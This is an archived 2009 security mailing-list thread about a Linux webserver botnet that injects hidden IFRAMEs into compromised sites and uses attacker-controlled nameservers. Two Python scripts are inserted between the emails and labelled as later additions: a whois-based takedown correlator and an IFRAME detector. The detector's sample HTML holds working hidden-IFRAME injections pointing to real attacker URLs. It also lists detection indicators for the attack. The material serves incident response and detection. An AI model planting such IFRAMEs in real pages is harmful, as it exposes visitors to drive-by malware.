[nsp-sec] Linux webserver botnet

Shelton, Steve sshelton at Cogentco.com
Tue Sep 15 11:27:41 EDT 2009


Thomas,

Thanks for the info; I currently see the following series of DNS
servers facilitating both domains.

> hxxp://red-wolf.ru:8080/ts/in.cgi?open
> hxxp://doxyia.ru:8080/index.php

--- 09/15/09 09:17:48 Mountain Daylight Time

ns1.red-wolf.ru [216.24.153.206]
ns2.red-wolf.ru [74.55.116.90]
ns3.red-wolf.ru [64.235.54.100]
ns4.red-wolf.ru [66.232.147.85]

ns1.doxyia.ru [216.24.153.206]
ns2.doxyia.ru [74.55.116.90]
ns3.doxyia.ru [64.235.54.100]
ns4.doxyia.ru [66.232.147.85]

Bulk mode; whois.cymru.com [2009-09-15 14:40:13 +0000]

9848    | 66.232.147.85    | GNGAS Enterprise Networks
13649   | 216.24.153.206   | ASN-VINS - ViaWest
21844   | 74.55.116.90     | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
26277   | 64.235.54.100    | PREMIANET - A+Hosting, Inc.

Bulk mode; peer-whois.cymru.com [2009-09-15 14:40:15 +0000]

174     | 216.24.153.206   | COGENT Cogent/PSI
174     | 64.235.54.100    | COGENT Cogent/PSI
701     | 66.232.147.85    | UUNET - MCI Communications Services, Inc. d/b/a Verizon Business
2828    | 64.235.54.100    | XO-AS15 - XO Communications
2914    | 66.232.147.85    | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
2914    | 74.55.116.90     | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
3356    | 216.24.153.206   | LEVEL3 Level 3 Communications
3356    | 74.55.116.90     | LEVEL3 Level 3 Communications
3491    | 66.232.147.85    | BTN-ASN - Beyond The Network America, Inc.
3549    | 74.55.116.90     | GBLX Global Crossing Ltd.
3561    | 74.55.116.90     | SAVVIS - Savvis
4565    | 74.55.116.90     | MEGAPATH2-US - MegaPath Networks Inc.
6461    | 74.55.116.90     | MFNX MFN - Metromedia Fiber Network
7385    | 64.235.54.100    | INTEGRATELECOM - Integra Telecom, Inc.
9318    | 66.232.147.85    | HANARO-AS Hanaro Telecom Inc.
10026   | 66.232.147.85    | ANC Asia Netcom Corporation
10310   | 74.55.116.90     | YAHOO-1 - Yahoo!
15412   | 66.232.147.85    | FLAG-AS Flag Telecom Global Internet AS
32184   | 216.24.153.206   | RMIX-ASN - Comfluent

I'm currently working on killing off at least two of the DNS servers.

Steve Shelton
Security Engineer
Cogent Communications
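The nameserver listing and the two Team Cymru bulk lookups above are the raw material for deciding whom to contact: the origin AS of each IP gets the abuse report, and the upstream ASNs from the peer lookup are the escalation path if the origin does not act. The script below is an added example (not Steve's code or a Cogent tool) that parses those three listings, finds the IPs serving DNS for both zones, and groups origin and upstream ASNs per IP. The data strings are copied from the thread; the parsing and grouping logic is an assumption about how one would automate the same correlation.

```python
"""Correlate NS records and Team Cymru bulk whois output for two domains
into a per-IP takedown plan: which origin AS to contact, and which
upstream ASNs could null-route the prefix if the origin does not act.
The sample data below is copied from the thread; the parsing and
grouping code is an added example, not something Steve posted."""
from collections import defaultdict
import re

# Nameserver lines as listed in the thread, format "host [ip]".
NS_RECORDS = """\
ns1.red-wolf.ru [216.24.153.206]
ns2.red-wolf.ru [74.55.116.90]
ns3.red-wolf.ru [64.235.54.100]
ns4.red-wolf.ru [66.232.147.85]
ns1.doxyia.ru [216.24.153.206]
ns2.doxyia.ru [74.55.116.90]
ns3.doxyia.ru [64.235.54.100]
ns4.doxyia.ru [66.232.147.85]
"""

# whois.cymru.com bulk output (origin AS per IP) from the thread.
ORIGIN_WHOIS = """\
9848    | 66.232.147.85    | GNGAS Enterprise Networks
13649   | 216.24.153.206   | ASN-VINS - ViaWest
21844   | 74.55.116.90     | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
26277   | 64.235.54.100    | PREMIANET - A+Hosting, Inc.
"""

# peer-whois.cymru.com bulk output (upstream ASNs per IP) from the thread.
PEER_WHOIS = """\
174     | 216.24.153.206   | COGENT Cogent/PSI
174     | 64.235.54.100    | COGENT Cogent/PSI
701     | 66.232.147.85    | UUNET - MCI Communications Services, Inc. d/b/a Verizon Business
2828    | 64.235.54.100    | XO-AS15 - XO Communications
2914    | 66.232.147.85    | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
2914    | 74.55.116.90     | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
3356    | 216.24.153.206   | LEVEL3 Level 3 Communications
3356    | 74.55.116.90     | LEVEL3 Level 3 Communications
3491    | 66.232.147.85    | BTN-ASN - Beyond The Network America, Inc.
3549    | 74.55.116.90     | GBLX Global Crossing Ltd.
3561    | 74.55.116.90     | SAVVIS - Savvis
4565    | 74.55.116.90     | MEGAPATH2-US - MegaPath Networks Inc.
6461    | 74.55.116.90     | MFNX MFN - Metromedia Fiber Network
7385    | 64.235.54.100    | INTEGRATELECOM - Integra Telecom, Inc.
9318    | 66.232.147.85    | HANARO-AS Hanaro Telecom Inc.
10026   | 66.232.147.85    | ANC Asia Netcom Corporation
10310   | 74.55.116.90     | YAHOO-1 - Yahoo!
15412   | 66.232.147.85    | FLAG-AS Flag Telecom Global Internet AS
32184   | 216.24.153.206   | RMIX-ASN - Comfluent
"""

NS_LINE = re.compile(r"^(\S+)\s+\[(\d{1,3}(?:\.\d{1,3}){3})\]$")

def parse_ns_records(text):
    """Map each zone to the set of IPs its nameservers resolve to."""
    by_zone = defaultdict(set)
    for line in text.splitlines():
        m = NS_LINE.match(line.strip())
        if m:
            host, ip = m.groups()
            by_zone[host.split(".", 1)[1]].add(ip)   # drop the nsN label
    return dict(by_zone)

def parse_cymru(text):
    """Parse 'ASN | IP | AS name' lines; skip headers and blank lines."""
    records = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) == 3 and parts[0].isdigit():
            records.append((int(parts[0]), parts[1], parts[2]))
    return records

def asns_by_ip(records):
    out = defaultdict(set)
    for asn, ip, _name in records:
        out[ip].add(asn)
    return dict(out)

def shared_infrastructure(ns_by_zone):
    """IPs that provide DNS for every zone: the highest-value takedown targets."""
    sets = list(ns_by_zone.values())
    return set.intersection(*sets) if sets else set()

def takedown_plan(ns_text, origin_text, peer_text):
    """Per shared IP: origin AS to notify first, upstream ASNs as escalation."""
    shared = shared_infrastructure(parse_ns_records(ns_text))
    origin = asns_by_ip(parse_cymru(origin_text))
    peers = asns_by_ip(parse_cymru(peer_text))
    return {ip: {"origin": sorted(origin.get(ip, ())),
                 "upstreams": sorted(peers.get(ip, ()))}
            for ip in sorted(shared)}

if __name__ == "__main__":
    for ip, info in takedown_plan(NS_RECORDS, ORIGIN_WHOIS, PEER_WHOIS).items():
        print(f"{ip}: origin AS{info['origin']} upstreams {info['upstreams']}")
```

Running it shows that all four IPs serve both zones, so every one of them has exactly one origin AS to notify and between three and seven upstreams as a fallback; the parser ignores the "Bulk mode;" header lines, so the raw whois output can be pasted in unchanged.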

-----Original Message-----
From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Thomas
Hungenberg
Sent: Tuesday, September 15, 2009 8:37 AM
To: NSP-SEC List
Subject: Re: [nsp-sec] Linux webserver botnet

----------- nsp-security Confidential --------


Several compromised websites that had an IFRAME pointing to dyndns hosts
(like <hXXp://a2stu.blogdns.com:8080/ts/in.cgi?open>) injected last week
now have an IFRAME pointing to <hXXp://red-wolf.ru:8080/index.php>.

It appears the attackers are updating the injected IFRAMEs.

Currently I do not get any content from the new URL.

16265   | 85.17.237.5      | NL | red-wolf.ru     | LEASEWEB LEASEWEB AS
16276   | 91.121.121.6     | FR | red-wolf.ru     | OVH OVH
16276   | 91.121.134.229   | FR | red-wolf.ru     | OVH OVH
16276   | 91.121.74.84     | FR | red-wolf.ru     | OVH OVH
20857   | 80.69.74.73      | NL | red-wolf.ru     | TRANSIP-AS TransIP BV


     - Thomas

CERT-Bund Incident Response & Anti-Malware Team
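For site owners checking whether their own pages carry one of the injected IFRAMEs Thomas describes, the following is an added example (not CERT-Bund's or abuse.ch's code) that scans HTML for the indicators named in the thread: an external src on port 8080, the /ts/in.cgi redirector path, a DynDNS-style hostname, or a frame sized or styled to be invisible. The hostnames and paths are the ones quoted in the thread (defanged as hXXp there, used with a real scheme here so urlparse can split them); the sample HTML is constructed, and the extra dyndns.org suffix is an assumption added alongside the thread's blogdns.com.

```python
"""Flag injected IFRAMEs of the kind described in Thomas's message:
an external src on port 8080, the /ts/in.cgi redirector path, a dyndns
hostname, or a frame sized or styled to be invisible.  Added example for
checking one's own pages; the indicator values come from the thread
(defanged hXXp there, real scheme here), the sample HTML is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

SUSPECT_PORTS = {8080}                       # nginx proxies on compromised hosts
SUSPECT_PATHS = ("/ts/in.cgi",)              # redirector path seen in the thread
# blogdns.com is from the thread; dyndns.org added as another DynDNS zone (assumption).
DYNDNS_SUFFIXES = (".blogdns.com", ".dyndns.org")

# Constructed test page: one legitimate same-site frame, two injected ones.
SAMPLE_HTML = """<html><body><h1>Company news</h1>
<iframe src="/widgets/video.html" width="400" height="300"></iframe>
<iframe src="http://red-wolf.ru:8080/index.php" width="1" height="1"
        style="visibility: hidden"></iframe>
<iframe src="http://a2stu.blogdns.com:8080/ts/in.cgi?open" width="0" height="0"></iframe>
</body></html>"""

class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

def is_hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)

def classify_iframe(attrs, site_host):
    """Return the list of indicators that fire for one iframe (empty = clean)."""
    url = urlparse(attrs.get("src", ""))
    if not url.hostname or url.hostname == site_host:
        return []                            # relative or same-site frame
    reasons = []
    if url.port in SUSPECT_PORTS:
        reasons.append("external port %d" % url.port)
    if url.path.startswith(SUSPECT_PATHS):
        reasons.append("redirector path")
    if url.hostname.endswith(DYNDNS_SUFFIXES):
        reasons.append("dyndns host")
    if is_hidden(attrs):
        reasons.append("hidden frame")
    return reasons

def scan_html(html, site_host):
    """Return [(src, reasons)] for every iframe that triggers an indicator."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        reasons = classify_iframe(attrs, site_host)
        if reasons:
            findings.append((attrs.get("src", ""), reasons))
    return findings

if __name__ == "__main__":
    for src, reasons in scan_html(SAMPLE_HTML, "www.example.org"):
        print(src, "->", ", ".join(reasons))
```

Because the attackers are rotating the target host (dyndns names last week, red-wolf.ru now), the check keys on the structural traits of the injection rather than on a fixed hostname list, so a re-pointed IFRAME still trips the port and hidden-frame indicators.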

Thomas Hungenberg schrieb:
> ----------- nsp-security Confidential --------
> 
> 
> 
> ------------------------------------------------------------------------
> 
> Regarding the article on The Register:
> 
> I was working with Roman from abuse.ch on this last week and
> he blogged about it on Friday: <http://www.abuse.ch/?p=1801>
> 
> We've seen 1500+ unique dyndns hostnames used with IFRAMEs injected
> into compromised websites so far.
> 
> Please find attached a list of dyndns hostnames we have seen that are
> currently resolving (837 hostnames resolving to 105 unique IPs).
> Format: ASN | IP | CC | hostname | AS name
> 
> All these IPs most likely are compromised servers that are/were running
> an nginx proxy on port 8080 (it appears some servers have already been
> cleaned up).
> 
> 
>      - Thomas
> 
> CERT-Bund Incident Response & Anti-Malware Team
> 
> 
> SURFcert - Peter schrieb:
>> ----------- nsp-security Confidential --------
>>
>> Hi,
>>
>> Coincidence or not? Just today I read
>> http://www.theregister.co.uk/2009/09/12/linux_zombies_push_malware/ and
>> at the same time I got a report about a linux web server that was
>> infected and part of a botnet. I have ordered to not re-install that
>> specific server but try to get the services running on another one.
>>
>> They got into the system through an old vulnerable phpMyAdmin version.
>> The strange thing is there shouldn't be any phpMyAdmin on that box. We
>> will sort that out later. We can probably pull the source of the botnet
>> malware from the logging (at first sight it appears to be a host in
>> Germany). And we probably will get some information about the IRC
>> channel and passwords used to access 82.197.159.61 on port 9999.
>>
>> I hope to be able to get as much as possible out of that host before I
>> am off on holiday and without e-mail for about two weeks. Important
>> stuff will of course be shared as much as possible.
>>
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________

_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security

Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security counter-measures.
_______________________________________________